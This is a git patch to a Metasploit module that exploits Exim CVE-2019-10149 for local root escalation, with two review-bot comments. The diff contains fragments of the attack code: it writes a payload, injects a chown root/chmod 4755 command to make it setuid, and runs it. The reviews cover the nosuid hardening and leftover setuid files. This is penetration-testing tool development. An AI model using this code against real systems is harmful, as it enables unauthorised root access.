From 565e18cbe8a2fcda4cf86631be524ce8a7d6b5eb Mon Sep 17 00:00:00 2001
From: Guillaume Andre
Date: Thu, 11 Jul 2019 14:20:21 +0100
Subject: [PATCH] Add a few checks
Change-Id: Ieca129a54d2105bf646e6f848cb5ecec804c372f
---
 .../local/exim4_deliver_message_priv_esc.rb | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb b/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
index 051c1955dc..46fbd9e948 100644
--- a/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
+++ b/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
 include Msf::Exploit::FileDropper
 include Msf::Post::File
 include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
 def initialize(info = {})
 super(update_info(info,
@@ -16,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
 'Description' => %q{
 This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).
 Improper validation of recipient address in deliver_message()
- function in /src/deliver.c may lead to remote command execution
+ function in /src/deliver.c may lead to command execution
 with root privileges (CVE-2019-10149).
 },
 'License' => MSF_LICENSE,
@@ -133,8 +134,6 @@ class MetasploitModule < Msf::Exploit::Local
 else
 session.shell_command_token("rm -f #{@payload_path}")
 end
-
- print_good("Check session #{session.name}, you should have a root shell!")
 end
 def check
@@ -166,6 +165,10 @@ class MetasploitModule < Msf::Exploit::Local
 fail_with(Failure::BadConfig, "#{base_dir} is not writable")
 end
+ if nosuid?(base_dir)
+ fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
+ end
+
 unless datastore['PrependSetuid'] && datastore['PrependSetgid']
 fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
 'to get root privileges.')
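Review bot: The new `nosuid?(base_dir)` guard in the fourth hunk carries no comment explaining why the mount option matters, and the commit message ("Add a few checks") does not say either. A one-line comment above the `if` would help, for example `# setuid bits are ignored on a nosuid mount, so the chmod 4755 step later in this method cannot yield root`. For readers on the defending side this is the hardening the check detects: a writable directory mounted `nosuid` stops this step of the technique. The enclosing method starts and ends outside the hunk.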
@@ -175,15 +178,12 @@ class MetasploitModule < Msf::Exploit::Local
 write_file(@payload_path, payload.encoded_exe)
 inject_payload(encode_command("/bin/bash -c \"chown root #{@payload_path};"\
 "chmod 4755 #{@payload_path}\""))
- if setuid?(@payload_path)
- cmd_exec("#{@payload_path & echo ")
- if session_created?
- return
- end
+ unless setuid?(@payload_path)
+ rm_f(@payload_path)
+ fail_with(Failure::Unknown, "Couldn't escalate privileges")
 end
- rm_f(@payload_path)
- print_error("Couldn't escalate privileges")
+ cmd_exec("#{@payload_path} & echo ")
 end
 end
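Review bot: After the final `cmd_exec` nothing in the new code removes `@payload_path` when no session comes back; the removed lines ran `rm_f(@payload_path)` in that case, and the only other cleanup visible on this page is the `rm -f #{@payload_path}` that runs from an established session. By that point the file has been made root-owned and mode 4755, so a run that stalls here leaves a setuid-root executable in `base_dir` on the host under test. Whether the unprivileged session can still delete a root-owned file depends on the directory's permissions, so at minimum the operator should be told, e.g. `print_warning("#{@payload_path} is setuid root; remove it manually if no session opens")` after the `cmd_exec` line. The enclosing method begins outside the hunk.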